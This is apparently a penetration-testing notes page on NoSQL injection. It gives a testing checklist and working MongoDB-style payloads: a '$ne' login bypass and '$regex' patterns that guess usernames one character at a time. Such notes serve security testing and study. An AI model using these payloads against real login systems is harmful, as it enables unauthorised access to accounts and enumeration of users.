Nosql injection

CHECKLIST

Try for authentication bypass
Try to find which database is working on backend. i.e., graphQL , MongoDB
Try sending data in json.
Change content-type to json
change request method GET > POST {as it is impossible to send json data in GET request}
Try json type-juggling

Difference between sql & nosql database

https://www.javatpoint.com/sql-vs-nosqlwww.javatpoint.com

Exploiting Methodology / Technique

NoSQL InjectionMedium

Payloads

PayloadsAllTheThings/NoSQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

username[$ne]=abc&password[$ne]=xyz&login=login    > to bypass authentication

username[$regex]=abc&password[$ne]=xyz&login=login    > brute-forcing username

username[$regex]=a    >    checking that particular alphabets "a" come in name or not

=a    >    checking alphabet existence
=^a   >    checking the first alphabet of username
=^a.* >    full-payload

Previoussql injection NextLFI (path traversal)

Last updated 1 year ago

hashtagDifference between sql & nosql database

hashtagExploiting Methodology / Technique

hashtagPayloads

Difference between sql & nosql database

Exploiting Methodology / Technique

Payloads